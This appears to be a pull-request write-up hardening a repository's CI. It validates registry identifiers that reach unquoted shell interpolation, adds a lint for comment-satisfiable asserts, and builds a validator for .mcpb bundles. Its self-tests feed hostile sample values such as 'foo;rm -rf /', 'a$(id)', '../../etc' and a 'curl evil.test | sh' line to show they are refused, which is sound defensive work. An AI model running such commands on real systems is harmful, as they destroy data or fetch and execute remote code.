`release_matrix.py` emitted raw `skills.json` key names into the build matrix, where `ci.yml` interpolates them into shell unquoted at **six** sites: `cd ${{ matrix.skill.dir }}` twice (lines 231, 251) and `--slug ${{ matrix.skill.name }}` four times (270, 278, 287, 307). [CORRECTED - this originally said one `dir` site and three `name` steps.] CI triggers on `pull_request`, so on a fork PR the fork's own `skills.json` is the input, and `build` declares only `needs: prepare`.

I also measured which identifiers reach a shell, not just the slug: `cli_binary` and `mcp_binary` land in `release.yml`'s build+upload step from the same matrix JSON, so they get the same treatment.

### The trap, verified

```
$ python3 - <<'EOF'
SLUG = re.compile(r"^[a-z0-9][a-z0-9-]*$")
EOF
total slugs: 67
slugs failing SLUG_RE: []
declared source_dirs: {'msp-skills-concierge': '_meta'}
source_dirs failing SLUG_RE: {'msp-skills-concierge': '_meta'}
```

`msp-skills-concierge` declares `source_dir: "_meta"`, and the slug rule rejects a leading underscore. Applying one pattern to both would have failed the registry load for the whole repo - a gate that always fires. So there are three patterns: `SLUG_RE` for slugs, a looser `SOURCE_DIR_RE` that accepts `_meta` while still forbidding `/`, `\`, a leading `.` (so `.` and `..` can never match), whitespace and shell metacharacters, and `BINARY_RE` for the two binary names.

The check runs inside `registry.load()`, so every consumer that imports the module inherits it and no per-step quoting churn is needed.

[CORRECTED] This originally read "the one door every reader comes through", which was false: `is_registered_slug.py:53`, `verify_live.py:63` and `check_registry_state.py:45` all read `skills.json` with a bare `json.loads`, and `is_registered_slug.py` is precisely the membership gate `release.yml` and `mcp-publish.yml` shell out to. Fixed rather than reworded: `is_registered_slug.py` and `verify_live.py` now read through `load()` and take `SLUG_RE` from `registry.py`. `check_registry_state.py` stays raw **on purpose** - it diffs the working file against its `origin/main` baseline and has to be able to see and report a file `load()` would refuse - and now carries a docstring saying so. The module docstring names that one exception instead of claiming there are none.

### Both directions

Silent on good input, on the real registry, through CI's exact `prepare` command:

```
$ python3 tools/maintainer/release_matrix.py --skills-only | head -c 120
{"skill": [{"name": "abnormal", "dir": "skills/abnormal/cli", "module": "abnormal-pp-cli", "cli_cmd": "./cmd/abnormal-cl
GOOD DIRECTION: exit=0

$ python3 tools/maintainer/registry.py --self-test
PASS: registry grammar self-test - the live registry (67 skills) validates clean, '_meta' is accepted as a source_dir and rejected as a slug, and 9 malformed identifiers are refused.
```

Fires on broken input. A malformed slug injected into `tools/maintainer/skills.json`, then the same `prepare` command:

```
$ python3 scratch/inject.py 'foo;rm -rf /'
injected slug: 'foo;rm -rf /'

$ python3 tools/maintainer/release_matrix.py --skills-only
registry: refusing to load a registry with malformed identifiers:

tools/maintainer/skills.json: slug 'foo;rm -rf /' does not match ^[a-z0-9][a-z0-9-]*$.
  These identifiers are emitted by tools/maintainer/release_matrix.py into the
  GitHub Actions build matrix, where the workflows interpolate them into shell
  (`cd ${{ matrix.skill.dir }}`, `--slug ${{ matrix.skill.name }}`). A value
  outside the grammar is refused HERE rather than reaching a command line.
  Fix the entry in tools/maintainer/skills.json. See issue #251.
BAD DIRECTION: exit=1
```

Same for `Foo` (exit 1, same message shape). The injection was reverted with `git checkout -- tools/maintainer/skills.json`; the matrix recovers to 65 rows.

The self-test's nine rejections cover `foo;rm -rf /`, `Foo`, `a$(id)`, a leading-hyphen slug that would read as a flag, `../../etc` and `a/b` as `source_dir`, `x|y` and `a b` as binary names, and a non-string value. It also asserts explicitly that `SLUG_RE` rejects `_meta` while `SOURCE_DIR_RE` accepts it, so a future "simplification" to one pattern fails the self-test instead of the repo.

---

## Piece B - #252: asserts that a comment can satisfy

### Measured FIRST, before choosing a shape

```
ledgers: 65
entries: 409
asserts: 2579
contains asserts: 2280
not_contains asserts: 299
file extensions: {'.go': 1674, '.json': 559, '.md': 340, '.mod': 2, '<none>': 4}
```

**26 of the 2280 `contains` asserts would newly FAIL under comment-stripped counting.** All 26 are Go. That number is now emitted by the shipped tool:

```
$ python3 tools/maintainer/check_handfixes.py --lint-asserts | head -1
REPORT: 26 assert(s) can be satisfied by comments alone (the guarded code could be gone and the gate would still pass):
```

### What the number decided

26 is small, but the important thing is *what* they are. 25 are prose needles - `axcient` asserts `Hand-wired:` 5x in `sync.go`, several connectors assert an explanatory doc-comment sentence a reprint must not drop.

**The 26th is not prose, and needs a real fix rather than an annotation:** `[cipp] handfix 'client-credentials-token-refresh'` asserts 4x `needsClientCredentialsMint` in `cli/internal/client/client.go` and finds 6 - but only **3** of those are code (lines 740, 745, 777); the other three are comments (767, 811, 1049). Delete one of the three call sites and 5 >= 4 still passes. The right fix is `"code_only": true` with `min_count` lowered to 3, which is a judgement call on cipp's ledger and touches `skills/`, so it is named here rather than done here.
 Comment-stripped counting defaulting ON would false-RED all 26, and this PR is forbidden to touch `skills/` to fix them. So the honest shape is the issue's option 3 plus option 2, and *no ledger is rewritten here*:

- **`code_only` per assert, tri-state.** Absent = today's whole-file count (unchanged default, zero blast radius). `true` = count comment-stripped source. `false` = "this assert deliberately targets a comment", which also silences the lint. One field, three meanings, no new vocabulary.
- **A lint** with a precise definition: an assert is weak when the comment-stripped count drops below `min_count` - exactly "delete the code, keep the comment, still passes". Advisory repo-wide, HARD in `--changed` for entries the change-set adds or edits.

The `--changed` scoping is per **assert**, not per entry or per ledger. It re-runs the weak-assert lint over the BASE ledger reading the BASE files, and reports only asserts that are weak now and were not weak at base. So the 26 can only go down, and nobody is taxed for someone else's backlog.

[CORRECTED] The first cut of this was per **entry** (canonicalise the entry, compare against `git show <base>:<ledger>`), and that was a real defect: editing only an entry's `why` field re-linted every assert inside it, so a one-word prose fix hard-failed CI on a weak assert the contributor did not write. Both directions are now proved end-to-end against this repo - see the corrections section at the bottom.

Four comment syntaxes, not one stripper pretending to cover all: Go and `go.mod` (`//` and `/* */`, with interpreted-string, rune and raw-string literals respected so the `//` in a URL literal is not a comment); Python and shell (`#`, quote-aware); Markdown (`<!-- -->`); and JSON, which has **no** comment syntax - `code_only: true` on a `.json` target is a usage **error**, not a silent no-op, because accepting it would report a stronger check than was run. The 4 extension-less targets (`cli/NOTICE`) likewise get no stripper and are exempt from the lint rather than guessed at.

### Both directions - the issue's own reproduction, on the real connector

Rename the guarded symbol, leave its doc comment in place (`servosity`, `config.go`: `stripAuthScheme` -> `trimScheme` at the definition and the call site), and weaken the ledger assert back to the bare symbol name the issue says is natural to write:

```
$ python3 scratch/repro252.py
config.go: stripAuthScheme occurrences left = 1 (the doc comment)
handfixes.json: assert weakened to the bare symbol name
```

**The shipped hard gate still passes - that is the hole:**

```
$ python3 tools/maintainer/check_handfixes.py --slug servosity
PASS: hand-fix ledgers intact for 1 skill(s).
exit=0
```

**The CI PR-diff gate now fails on the same commit:**

```
$ python3 tools/maintainer/check_handfixes.py --changed --base fde794335
FAIL: hand-fix ledger entries added or edited in this change carry asserts that comments alone can satisfy (issue #252):

  - [servosity] handfix 'msp-token-auth-scheme-prefix': assert on cli/internal/config/config.go needs 1x `stripAuthScheme` and finds 1, but only 0 of those are in CODE - the rest are in comments. Delete the guarded code, leave the comment, and this assert still passes.
      Fix it one of three ways: narrow the needle to something only the code can contain (a full signature, an assignment, a call site); add "code_only": true to count comment-stripped source; or, if the comment IS the thing a reprint must not drop, add "code_only": false to say so on purpose.

exit=1
```

**And `code_only: true` turns the same situation into a hard ledger failure:**

```
$ python3 tools/maintainer/check_handfixes.py --slug servosity
FAIL: hand-fix ledger regressions (a reprint may have clobbered a live-validated fix):

  - [servosity] handfix 'msp-token-auth-scheme-prefix' REGRESSED in cli/internal/config/config.go: expected 1x `stripAuthScheme` in the comment-stripped source, found 0. A reprint likely clobbered it. ...
exit=1
```

**Silent on unmodified main.** After `git checkout -- skills/servosity`:

```
$ python3 tools/maintainer/check_handfixes.py --slug servosity
PASS: hand-fix ledgers intact for 1 skill(s).
$ python3 tools/maintainer/check_handfixes.py --lint-asserts --slug servosity
PASS: no comment-satisfiable asserts found.
$ python3 tools/maintainer/check_handfixes.py
PASS: hand-fix ledgers intact for 65 skill(s).
$ python3 tools/maintainer/check_handfixes.py --changed --base origin/main
PASS: every generated-file hand-edit in this change is recorded (or part of a reprint), and no ledger entry it touches has a comment-satisfiable assert.
```

**Silent for a neighbour's backlog.** A temporary commit appending a clean entry to `axcient`'s ledger, which already carries two `Hand-wired:` weak asserts:

```
appended a clean entry to a ledger that already carries weak asserts
pre-existing 'Hand-wired:' asserts still in this ledger: 2

$ python3 tools/maintainer/check_handfixes.py --changed --base fde794335
PASS: ... and no ledger entry it touches has a comment-satisfiable assert.
exit=0
```

Both temporary commits were dropped with `git reset --hard`; the branch carries one commit.

---

## Piece C - #287: the `.mcpb` builder and validator

### Measured before, on the real published artifacts

```
$ gh release download hudu-v0.1.8 --pattern 'hudu-mcp.mcpb'
$ zipinfo -l hudu-mcp.mcpb
drwxr-xr-x  3.0 unx        0 bx        0 stor  bin/
-rw-r--r--  3.0 unx 16400546 bx  6605385 defN  bin/hudu-mcp-linux-amd64
-rw-r--r--  3.0 unx 16723904 bx  6690637 defN  bin/hudu-mcp-darwin-amd64
-rw-r--r--  3.0 unx 15270050 bx  5979981 defN  bin/hudu-mcp-linux-arm64
-rw-r--r--  3.0 unx 16873984 bx  6745763 defN  bin/hudu-mcp-windows-amd64.exe
-rw-r--r--  3.0 unx 15677250 bx  6191791 defN  bin/hudu-mcp-darwin-arm64
-rw-r--r--  3.0 unx     1775 tx      880 defN  manifest.json
7 files, 80947509 bytes uncompressed, 32214437 bytes compressed:  60.2%

$ unzip -p hudu-mcp.mcpb manifest.json | jq -r .server.mcp_config.command
${__dirname}/bin/hudu-mcp        # in no bundle
```

Three premises confirmed on real artifacts, not assumed:

1. `bin/hudu-mcp` is not a member. The command cannot resolve.
2. **Every binary member is mode `0644`** - and that includes `connectwise-manage-v0.1.6`, the bundle whose manifest paths *do* resolve. "The only one that can launch" ships a non-executable server too.
3. The live bundle is DEFLATE: 32 MB compressed over 81 MB uncompressed. `zipfile.ZipInfo` defaults to `ZIP_STORED`, which would have made it ~81 MB.

### What was built

`tools/maintainer/mcpb_bundle.py`, pure stdlib (no `lipo`, no Xcode, no Go, so it runs on `ubuntu-latest`). The decision - universal Mach-O for darwin plus per-OS `platform_overrides` - was already settled on the issue and is not reopened here; upstream `mvanhorn/cli-printing-press#4366` (ours) was closed unmerged on 2026-08-28, so the equivalent downstream packaging fix is the live branch. I read the upstream diff and ported the algorithm; no Go is vendored.

- **`build`** merges the two darwin slices into a universal Mach-O (big-endian `0xCAFEBABE` header, 20-byte arch records, align 2^14), writes per-OS `platform_overrides` that resolve, sets mode `0755` on every binary, and writes every member `ZIP_DEFLATED`.
- **`validate`** asserts every command path the manifest declares - `mcp_config.command` AND each `platform_overrides.<os>.command` - names a member the archive contains, that `entry_point` resolves, that each binary member is executable, and that no large member regressed to `ZIP_STORED`.
- Wired into `mcp-publish.yml`: the builder replaces the hand-rolled `zip -r`, and `validate` runs as its own step **before** the release upload, so a bundle that cannot start never reaches a release or the registry.

Three deliberate deviations, each with a reason in the code:

- **`--binary-prefix` is passed explicitly, not derived from `manifest.json`'s `name`.** Upstream uses `manifest.Name` as the binary base. Measured here: **8 manifests still read `<slug>-pp-mcp`** (`acronis`, `auvik`, `aws-billing`, `maxio`, `threatlocker`, `unifi-network`, `wordpress`, `zammad`) while the release assets are `<slug>-mcp-*`. Deriving from the manifest would have named members that do not exist on 8 connectors.
- **The merged thin darwin slices are dropped from the archive.** Nothing in the manifest can address them once a universal member exists. Net effect on size: the rebuilt hudu bundle is 32,150,279 bytes vs the published 32,215,645 - slightly *smaller*.
- **`platform_overrides` is replaced, not merged.** `connectwise-manage` carries hand-written overrides; a key for an OS a given build has no binary for would otherwise survive and name a missing member. Per-OS `args`/`env` are carried forward for the OSes that do get an override.
- **A second `actions/checkout` of the default branch.** `workflow_run` runs the default branch's *workflow file* but the job checks out the *tag*, so a tag cut before this landed would have no builder and would silently fall back to the broken zip. `skills/<slug>/manifest.json` still comes from the tag, which is correct.

The gate does **not** assert `entry_point == "bin/" + mcp_binary`, per the issue and per the matching note in `check_env_schema.py`, which I extended with a pointer to this sibling rather than contradicting.

### Both directions, on real downloaded artifacts

**FAILS on a real published bundle:**

```
$ python3 tools/maintainer/mcpb_bundle.py validate hudu-mcp.mcpb
FAIL: hudu-mcp.mcpb cannot launch as published:

  - hudu-mcp.mcpb: server.mcp_config.command is '${__dirname}/bin/hudu-mcp' but the archive contains no 'bin/hudu-mcp'. The extension would install, prompt for credentials, and fail at the first tool call. Members: bin/, bin/hudu-mcp-darwin-amd64, bin/hudu-mcp-darwin-arm64, bin/hudu-mcp-linux-amd64, bin/hudu-mcp-linux-arm64, bin/hudu-mcp-windows-amd64.exe, manifest.json

  - hudu-mcp.mcpb: server.entry_point is 'bin/hudu-mcp' but the archive contains no such member

  - hudu-mcp.mcpb: bin/hudu-mcp-darwin-amd64 is mode 0644 - not executable. `gh release download` writes 0644 and `zip -r` preserves it, which is how every published bundle shipped a server nothing can exec.
  ... (same for the other four binaries)

exit=1
```

**PASSES on one this builder produced**, from that same bundle's own binaries:

```
$ python3 tools/maintainer/mcpb_bundle.py build --manifest skills/hudu/manifest.json \
    --bin-dir dl --binary-prefix hudu-mcp --out fixed/hudu-mcp.mcpb --version 0.1.8
built fixed/hudu-mcp.mcpb (32150279 bytes, 5 members):
  manifest.json
  bin/hudu-mcp-darwin
  bin/hudu-mcp-linux-amd64
  bin/hudu-mcp-linux-arm64
  bin/hudu-mcp-windows-amd64.exe

$ python3 tools/maintainer/mcpb_bundle.py validate fixed/hudu-mcp.mcpb
PASS: fixed/hudu-mcp.mcpb - every declared command resolves to an executable member.
exit=0

$ zipinfo -l fixed/hudu-mcp.mcpb
-rw-r--r--  2.0 unx     2102 b-      941 defN manifest.json
-rwxr-xr-x  2.0 unx 32421698 b- 12855929 defN bin/hudu-mcp-darwin
-rwxr-xr-x  2.0 unx 16400546 b-  6590456 defN bin/hudu-mcp-linux-amd64
-rwxr-xr-x  2.0 unx 15270050 b-  5969465 defN bin/hudu-mcp-linux-arm64
-rwxr-xr-x  2.0 unx 16873984 b-  6732866 defN bin/hudu-mcp-windows-amd64.exe
```

`0755`, DEFLATE, and the merged darwin member - all three measured defects gone.

**The universal binary is real, not merely well-formed by my own reader.** macOS's own tooling is the oracle:

```
$ file ext/bin/hudu-mcp-darwin
Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit executable x86_64] [arm64]

$ lipo -detailed_info ext/bin/hudu-mcp-darwin
fat_magic 0xcafebabe
nfat_arch 2
architecture x86_64
    cputype CPU_TYPE_X86_64
    cpusubtype CPU_SUBTYPE_X86_64_ALL
    offset 16384      size 16723904   align 2^14 (16384)
architecture arm64
    cputype CPU_TYPE_ARM64
    cpusubtype CPU_SUBTYPE_ARM64_ALL
    offset 16744448   size 15677250   align 2^14 (16384)
```

**And it runs**, both slices, after unzipping (the executable bit survives unpacking):

```
$ ./ext/bin/hudu-mcp-darwin --version
flag provided but not defined: -version
Usage of ./ext/bin/hudu-mcp-darwin:
  -addr string ...

$ arch -x86_64 ./ext/bin/hudu-mcp-darwin --version
flag provided but not defined: -version
Usage of ./ext/bin/hudu-mcp-darwin: ...
```

**`connectwise-manage` improves too.** Rebuilding it from its own published binaries produces a bundle that serves Intel Macs as well as Apple Silicon - it was arm64-only before:

```
$ python3 tools/maintainer/mcpb_bundle.py build --manifest skills/connectwise-manage/manifest.json \
    --bin-dir dlcwm --binary-prefix connectwise-manage-mcp --out fixed/connectwise-manage-mcp.mcpb --version 0.1.6
built ... 5 members: manifest.json, bin/connectwise-manage-mcp-darwin, .../linux-amd64, .../linux-arm64, .../windows-amd64.exe

$ lipo -info ext2/bin/connectwise-manage-mcp-darwin
Architectures in the fat file: ... are: x86_64 arm64

$ python3 tools/maintainer/mcpb_bundle.py validate fixed/connectwise-manage-mcp.mcpb
PASS: ... every declared command resolves to an executable member.
```

Its rewritten `entry_point` is `bin/connectwise-manage-mcp-darwin`, and the validator accepts it - proof the gate does not require the bare `bin/<mcp_binary>` name.

**The self-test proves the same in CI, without network**, with the false-RED direction covered explicitly - a `connectwise-manage`-shaped manifest (arch-suffixed `entry_point`, three overrides) must PASS:

```
$ python3 tools/maintainer/mcpb_bundle.py --self-test
PASS: mcpb_bundle self-test - the validator fires on the published bare-name defect, a broken per-OS override, a 0644 binary member and a ZIP_STORED member, and is silent on the connectwise-manage manifest shape and on a bundle the builder produced (universal darwin Mach-O with both slices 16 KiB-aligned, per-OS overrides, DEFLATE, mode 0755).
```

---

## Gates run locally

```
bash tools/maintainer/ci_guards.sh                                   All CI guards passed.
python3 tools/maintainer/check_skill_contract.py                     passed for 67 skill(s)
python3 tools/maintainer/check_md_links.py                           passed across 548 file(s)
python3 tools/maintainer/registry.py --self-test                     PASS
python3 tools/maintainer/check_handfixes.py --self-test              PASS
python3 tools/maintainer/check_handfixes.py                          PASS for 65 skill(s)
python3 tools/maintainer/check_handfixes.py --changed --base origin/main  PASS
python3 tools/maintainer/mcpb_bundle.py --self-test                  PASS
python3 tools/maintainer/check_registry_state.py                     OK (67 entries)
python3 tools/maintainer/check_release_contract.py                   passed for 65 skill(s)
python3 tools/maintainer/check_env_schema.py                         PASS (65 skills)
python3 tools/maintainer/check_mcp_registry.py                       PASS (65 server.json)
python3 tools/maintainer/check_pinned_artifacts.py --base origin/main --no-network  OK (192 URLs)
python3 tools/maintainer/check_copyright.py                          exit 0
python3 tools/maintainer/check_no_todos.py                           exit 0
python3 tools/maintainer/check_vocabulary.py                         exit 0
python3 tools/maintainer/check_aeo.py                                exit 0
python3 tools/maintainer/check_video_assets.py                       exit 0
python3 tools/maintainer/build-catalog.py --check                    no derived-file drift
```

`release_state.py` reports exactly what it reported before:

```
$ git checkout --detach origin/main && python3 tools/maintainer/release_state.py > rs_base.txt
$ git checkout chore/maintainer-gates-and-mcpb-builder && python3 tools/maintainer/release_state.py > rs_head.txt
$ diff rs_base.txt rs_head.txt
release_state.py output is BYTE-IDENTICAL before and after this branch
```

## CI cost

One new step in the single `guards` job running the three self-tests (about three seconds), and one extra `actions/checkout` inside the existing `mcp-publish.yml` job. No step widens the build matrix, nothing was added to `release_matrix.MACHINERY`, and this is one PR.

---

## What this deliberately does NOT do

- **It does not repair the 65 already-published `.mcpb` bundles.** That needs a release wave, deliberately deferred. `gh release upload --clobber` on an existing tag is specifically the wrong tool: `mcp-publish.yml` already recorded `packages[0].fileSha256` per version in the MCP Registry, so clobbering silently invalidates the published hash.
- **It does not rewrite the 26 weak ledger asserts.** `check_handfixes.py --lint-asserts` now runs as an advisory step in the existing `guards` job (exit 0 on findings), so they are reported on every CI run rather than only when somebody types the flag; the `--changed` ratchet stops the number growing. Fixing them is per-connector judgement (narrow the needle vs. `code_only: true` vs. `code_only: false`) and it touches `skills/`, which this PR does not.
- **It does not change the default counting behaviour of any existing assert.** `code_only` absent means exactly today's whole-file count.
- **It does not add `check_handfixes.py` to `release_matrix.MACHINERY`.** That is a separately-owned work item and would have forced a 65-row matrix onto this PR.
- **It does not fix `skills/<slug>/manifest.json` in the repo.** The builder rewrites the manifest it bundles; the on-disk manifests are untouched because this PR touches no file under `skills/`.
- **It does not chase `module_path` / `cmd_dirs`**, which also reach `release.yml` shell but are introspected from disk rather than declared in the registry. Both were checked against a conservative grammar and all 65 pass today; hardening them is a different change.

## Risks

- `mcp-publish.yml` cannot be exercised until a real tag is pushed. It is `workflow_run`-triggered on a successful Release, so the first proof is the next release wave. Mitigation: the builder validates its own output and refuses to write a bad bundle, `validate` runs as a separate step before the upload, and the whole path is covered by `--self-test` in `guards`.
- The universal Mach-O is verified by macOS `file`, `lipo -detailed_info`, and by executing both slices - but not yet by Claude Desktop installing a `.mcpb`. That closes on the first post-wave install.
- The second `actions/checkout` means the builder always comes from the default branch while `manifest.json` comes from the tag. That is deliberate, and it means a manifest-shape change on `main` would apply to a re-publish of an old tag.

Refs #251, #252, #287
## Follow-up: two fail-open holes CodeRabbit found in the new gates (commit `ce9a8b5`)

Both were real, both were in gates this PR itself introduces, and both failed open - which is the exact shape #252 is about. Fixed and proved.

### 1. `$` accepts a trailing newline, so a slug could still carry one into shell

Python's `$` matches at the end of the string **or immediately before a trailing newline**. All three grammars used `$`:

```
$ python3 -c "
import re
S=re.compile(r'^[a-z0-9][a-z0-9-]*\$')
print('trailing newline passes \$ anchor:', bool(S.match('hudu\n')))
Z=re.compile(r'^[a-z0-9][a-z0-9-]*\Z')
print('trailing newline passes \\\\Z anchor:', bool(Z.match('hudu\n')))
print('normal slug with \\\\Z:', bool(Z.match('hudu')))
"
trailing newline passes $ anchor: True
trailing newline passes \Z anchor: False
normal slug with \Z: True
```

[CORRECTED - this paragraph previously claimed that a slug of `hudu\ncurl evil.test | sh` "would have validated clean and reached `--slug ${{ matrix.skill.name }}` as two commands". That is false, and the measurement is below.]

```
value                            OLD $ accepts   NEW \Z accepts
'hudu'                           True            True
'safe\n'                         True            False
'hudu\n'                         True            False
'hudu\ncurl evil.test | sh'      False           False
'hudu\nid\n'                     False           False
```

An **embedded** newline never validated clean under either anchor - `[a-z0-9-]*` cannot match a newline - so the named string was rejected before the fix too, by the character class rather than by the anchor. The only class of value `$` admitted and `\Z` refuses is a **single trailing newline**. Measured link by link locally: `release_matrix.py` builds `dir` as `f"skills/{slug}/cli"`, giving `'skills/hudu\n/cli'`; `json.dumps` escapes it so the matrix still writes as one physical line to `GITHUB_OUTPUT` and `fromJSON` restores the real newline; and a shell handed that value in `cd ${{ matrix.skill.dir }}` sees two lines - `cd skills/hudu` then a bare `/cli` - and reports `/cli: No such file or directory`, exit 1, under `set -e`. **That is a broken job, not attacker-chosen commands.** No exploit is claimed, because none was demonstrated; the final link (GitHub Actions expanding the interpolation) was reasoned from documented behaviour, not run.

`\Z` is still the correct anchor and stays: the grammar means "the whole value is in the alphabet", and `$` quietly admits a value whose last character the alphabet excludes. It is **defence in depth plus a correctness fix**, not the closing of a demonstrated injection. The real exposure the grammar closes is that before this PR *nothing* validated these identifiers at all, and CI triggers on `pull_request`, so a fork PR's own `skills.json` is the matrix input.

The self-test case that carried the old label was also non-discriminating - the old `$` pattern rejected `"hudu\ncurl evil.test | sh"` too, so it would have passed before the fix. It is now a genuine trailing-newline slug, and the loop that follows proves the case discriminates by requiring the `$`-anchored twin of every shipped pattern to ACCEPT what `\Z` refuses:

```
$ python3 tools/maintainer/registry.py --self-test
PASS: registry grammar self-test - the live registry (67 skills) validates clean, '_meta' is accepted as a source_dir and rejected as a slug, and 11 malformed identifiers are refused (including the trailing-newline case Python's `$` anchor would have let through).
```

### 2. A non-boolean `code_only` silenced the lint and strengthened nothing

`check_skill` acted only on `code_only is True`, but `lint_entries` exempted on `"code_only" in a`. So `"code_only": "true"` - a one-character JSON typo - bought silence from the weak-assert lint while changing no counting at all. Reproduced before the fix:

```
$ python3 -c "... entry with 'code_only': 'true' (a string) ..."
lint findings with code_only="true" (a string): 0
```

Now a non-boolean is a hard ledger error, and only a genuine boolean exempts an assert:

```
[<slug>] handfix '<id>': assert on '<file>' has "code_only": 'true', which is not a boolean.
It must be true (count comment-stripped source) or false (this assert deliberately targets a
comment). A non-boolean silently changes nothing while looking like it does.
```

Both directions are in the self-test - the typo'd entry must produce exactly one lint finding AND a `not a boolean` ledger failure:

```
$ python3 tools/maintainer/check_handfixes.py --self-test
PASS: check_handfixes self-test - strippers keep code and literals and drop comments in Go/Python/Markdown, JSON and extension-less files report no stripper, issue #252's reproduction is silent before the code is deleted and fires after, and a non-boolean code_only is rejected rather than silently buying the assert an exemption.
```

### Re-run of every gate after the fix

```
python3 tools/maintainer/registry.py --self-test                     PASS (11 rejections)
python3 tools/maintainer/check_handfixes.py --self-test              PASS
python3 tools/maintainer/mcpb_bundle.py --self-test                  PASS
python3 tools/maintainer/check_handfixes.py                          PASS for 65 skill(s)
python3 tools/maintainer/check_handfixes.py --lint-asserts           REPORT: 26 (unchanged)
python3 tools/maintainer/check_handfixes.py --changed --base origin/main  PASS
python3 tools/maintainer/release_matrix.py --skills-only             65 rows
bash tools/maintainer/ci_guards.sh                                   All CI guards passed.
python3 tools/maintainer/check_skill_contract.py                     passed for 67 skill(s)
python3 tools/maintainer/check_md_links.py                           passed across 548 file(s)
python3 tools/maintainer/check_registry_state.py                     OK (67 entries)
python3 tools/maintainer/check_release_contract.py                   passed for 65 skill(s)
python3 tools/maintainer/check_mcp_registry.py                       PASS (65 server.json)
diff rs_base.txt rs_head2.txt                                        release_state still byte-identical
```

The first CI run on `f5307e7` was green on everything that had settled: `guards` pass (including the new self-test step and `check_handfixes --changed`), `prepare` pass, `security-gate` pass, CodeRabbit pass, and 64 of 65 build rows pass with 2 still in flight when this fix superseded it.

CodeRabbit's remaining pre-merge warning is docstring coverage (56.5% vs an 80% threshold) across the touched functions. Not addressed: the uncovered ones are small local helpers inside self-tests and the `Target`/`WeakAssert` value classes, and every public entry point already carries a docstring explaining the defect it guards.

---

## CI: 69/69 green on `ce9a8b5`

```
$ gh pr checks 307 --json name,bucket --jq '...'
pass: 69
```

`guards` on the fixed commit, straight out of the run log:

```
PASS: registry grammar self-test - the live registry (67 skills) validates clean, '_meta' is accepted as a source_dir and rejected as a slug, and 11 malformed identifiers are refused (including the trailing-newline case Python's `$` anchor would have let through).
PASS: check_handfixes self-test - strippers keep code and literals and drop comments in Go/Python/Markdown, JSON and extension-less files report no stripper, issue #252's reproduction is silent before the code is deleted and fires after, and a non-boolean code_only is rejected rather than silently buying the assert an exemption.
PASS: mcpb_bundle self-test - the validator fires on the published bare-name defect, a broken per-OS override, a 0644 binary member and a ZIP_STORED member, and is silent on the connectwise-manage manifest shape and on a bundle the builder produced.
```

The full 65-row build matrix ran (both `.github/workflows/` and `registry.py` are in `release_matrix.MACHINERY`, so scoping correctly failed open to the full matrix) and every row passed, including each skill's `check_handfixes.py --slug` step against the new counting code.



---

# Corrections after adversarial review (commits `f0a3f2f`, `cc20752`, `11fe1b9`, `5d41d29`, `f199efe`)

A fresh-context review found three blocking defects **in this PR's own gates**, plus a set of smaller truth defects. All are fixed on this branch. The three blocking ones first.

## B1. `code_only: true` made a `not_contains` assert WEAKER, and the docstring said the opposite

`check_skill()` replaced `content` with the comment-stripped source *before both* the `contains` branch and the `not_contains` branch. For an absence check that is backwards: a banned anti-pattern resurrected **inside a comment** stopped being reported. The weak-assert lint is `contains`-only, so nothing warned, and the self-test had zero coverage of the path. Meanwhile the module docstring told the author `true` is *"strictly stronger"* - true for the 2280 `contains` asserts, false for the 299 `not_contains` ones.

Reproduced on the pre-fix code, on a fixture where the banned needle survives **only** in a comment:

```
=== BROKEN (banned needle survives only in a comment) ===
  code_only=None   -> [fixture] handfix 'x' REGRESSED ... banned anti-pattern ... is present
  code_only=True   -> PASS (no findings)          <-- the fail-open
  code_only=False  -> [fixture] handfix 'x' REGRESSED ... is present
```

**Fix.** `code_only` now scopes a `contains` count and **nothing else**. `not_contains` is always evaluated whole-file, which is its strongest form - the banned pattern must be absent from code *and* from comments. Setting the flag on an assert with no `contains` is a hard ledger error, the same shape as the existing `.json` refusal, rather than a silent downgrade dressed up as a hardening. An assert may carry both keys; `code_only` then scopes only the `contains` half, which is why the refusal keys off the *absence* of `contains`, not the presence of `not_contains`. The module docstring, `docs/reprint-survival.md` and `docs/contributing.md` all say exactly that now.

**Both directions, in the self-test.** `not_contains` x {absent, `true`, `false`} x {broken, good}:

- absent + broken -> REGRESSED; absent + good -> silent.
- `true`/`false` + broken **and** + good -> refused as a usage error (it is a ledger error, not a file verdict).
- an assert carrying both keys -> `code_only` strengthens the `contains` half while `not_contains` still reads the whole file; silent on good input.

**Mutation-tested.** Reverting the fix (re-apply the strip to `not_contains`, drop the refusal) makes the self-test fail with 6 findings, naming exactly this hole. It is not a check that cannot fire.

## B2. The hard `--changed` ratchet fired on a prose-only edit

`--changed` is hard-fail in CI. It compared whole ledger **entries** against base, so editing one entry's `why` field re-linted every assert inside it - taxing a contributor for a pre-existing weak assert they did not cause. And the failure message pointed at `docs/reprint-survival.md`, which did not document `code_only` at all (`grep -n code_only docs/reprint-survival.md docs/contributing.md` -> no matches).

**Fix.** The comparison is per **assert**, against the base revision, and it re-runs the lint over the BASE ledger reading the BASE files through a `git show <base>:...` reader. An assert fires only when it is weak **now** and was **not weak at base**. Assert identity is `(slug, file, needle, min_count)` - deliberately excluding the entry's prose and its `id`, since none of those change what is checked.

**Both directions, end to end against this repo** (not a fixture):

```
# a prose-only edit to axcient's 'hand-wired-sync-synthesis', whose entry
# already carries two pre-existing weak asserts
-   "why": "`/device/{device_id}/autoverify` items carry no native identifier, ...
+   "why": "PROSE-ONLY EDIT. `/device/{device_id}/autoverify` items carry ...

BEFORE the fix: FAIL, exit 1, reporting both pre-existing weak asserts
AFTER  the fix: PASS: ... no assert this change added or weakened is comment-satisfiable.
                exit=0
```

```
# a genuinely NEW weak assert added to that same entry (a needle that exists in
# sync.go only inside a comment)
+ {"file": "cli/internal/cli/sync.go", "contains": "flat-list sync cannot fill them", "min_count": 1}

FAIL: this change ADDS or WEAKENS hand-fix asserts that comments alone can satisfy (issue #252).
      Each one below was not weak at the base revision:
  - [cipp-style report naming ONLY the new assert; the two pre-existing weak
     asserts in the same entry are correctly absent]
exit=1
```

Five cases now run inside `--self-test` against a throwaway git repository, so CI proves the ratchet's scope on every run:

| case | change | expected |
| --- | --- | --- |
| A | prose-only edit to an entry with a pre-existing weak assert | PASS |
| B | a genuinely new weak assert | FAIL |
| C | a new entry whose asserts are all strong | PASS |
| D | an *untouched* assert weakened by a code change in the same commit | FAIL |
| E | a second copy of an already-weak assert identity | FAIL |

